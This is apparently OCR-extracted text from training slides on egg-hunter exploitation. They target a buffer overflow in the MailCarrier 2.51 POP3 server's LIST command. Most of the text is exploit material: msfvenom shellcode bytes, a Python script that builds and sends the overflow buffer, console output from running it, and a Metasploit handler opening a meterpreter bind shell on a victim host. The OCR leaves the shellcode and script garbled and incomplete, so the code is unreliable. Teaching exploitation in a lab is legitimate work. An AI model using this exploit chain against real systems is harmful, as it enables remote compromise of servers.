"\X4F\x39\x70\x63\ x6 F\x61\x4F\x33\x6a\ x6e\ x6b\ xX56\xX72\x58\ x6b" 
"\X4C\ x4d\x61\x4d\x31\xX78\ X47\X43\xX35\ X62\X57\X70\ X63\X30\X75" 
"\X38\X33\xX47\x61\x63\x30\xX32\xX53\x6F\x43\ X64\X73\x58\x50\x4c" 
"\X42\xX57\x55\X76\X43\X37\xX49\ x6 f\X49\ X45 \ X78\ X38\ X4a\ xX30\ x53" 
"\X31\xX55\x50\x65\x50\x55\xX79\xX38\ x44\ x66\ X34\ X36\ x30\x32\x48" 
"\X57\xX59\x6F\xX70\x52\x4b\ x45\x50\ x4b\ x4 f\ x6e\xX35\x51\x7a\x34" 


Once again, we generate our shellcode using msfvenom. 


GNU nano 3.2 


Adding the shellcode to our exploit (1/2). 


hunters 


Buffer = * 2980 + eggy + * 20 + shellcode + * 2486 + nseh + seh + nops + egghunter + * (10000-6174-4-4-20-32) 
print 

print %len(buffer) 
s = socket.socket(socket.AF INET, socket.SOCK STREAM) 
connect-s.connect(( , 110)) 

print s.recv(1024) 

print 

s.send( * ) 

print s.recv(1024) 

print 

s.send( * ) 

print s.recv(1024) 

print 

s.send( + buffer + ) 

print s.recv(1024) 

s.send( ) 

s.close() 

time.sleep(1) 

print 


Adding the shellcode to our exploit (2/2). 


Egg hunters 


:-/hacktobasics/egghunter# python egghunter4-shellcode.py 
MailCarrier 2.51 POP3 Buffer Overflow in LIST command 


Sending pwnage buffer: with 10000 bytes... 
<2784.1556625231@>, TABS Lab POP3 server ready. 


Sending USERNAME 
test is known here. 


Sending PASSWORD 


Welcome! O messages (0 bytes) 


Sending Evil LIST buffer 


Running our final exploit with egg hunter and shellcode. 


Egg hunters 


SERE 


Egg hunters 


INT 2E. 
CMP AL,S 
POP EDX 


DWORD PTR 
HORT 0701 


Egg hunters 


(<) Dor © © © © © © © © © © © © Eo Eo Ew] 


To confirm, we find our tag in memory, followed by our nops and shellcode. 


Egg hunters 


PUSH ER: 
POP EC 


g hunters 


SI 
EDI 
IP 
32bit G(FFFFFFFF) 
at FFFFFFFF) 
GCFFFF 
OCFFFFFFFF) 


C:\Documents and Settings\test>netstat -an ifind "443" 


C:\Documents and Settings\test>netstat -an ifind "443" 
TCP 4.6.0.6:443 6.6.6.6:6 LISTENING 


C:\Documents and Settings\test>_ 


aa 16 57 


exptoiti ) > show options 
Module options (exploit/multi/handler): 


Name Current Setting Reguired Description 


Payload options (windows/meterpreter/bind tcp): 


Name Current Setting Reguired Description 


EXITFUNC process Exit technigue (Accepted: '', seh, thread, process, none) 
LPORT 443 The listen port 
RHOST 192.168.0.150 The target address 


Exploit target: 
Id Name 


0 Wildcard Target 


msf exploit( ) > run 

[*] Started bind TCP handler against 192.168.0.150:443 

[*] Sending stage (179779 bytes) to 192.168.0.150 

[*] Meterpreter session 1 opened (192.168.0.240:36491 -> 192.168.0.150:443) at 2019-04-30 13:57:04 +0200 


meterpreter > 


Connecting to our bind shell! 


Q and A 


@telspacesystems 
www.telspace.co.za 
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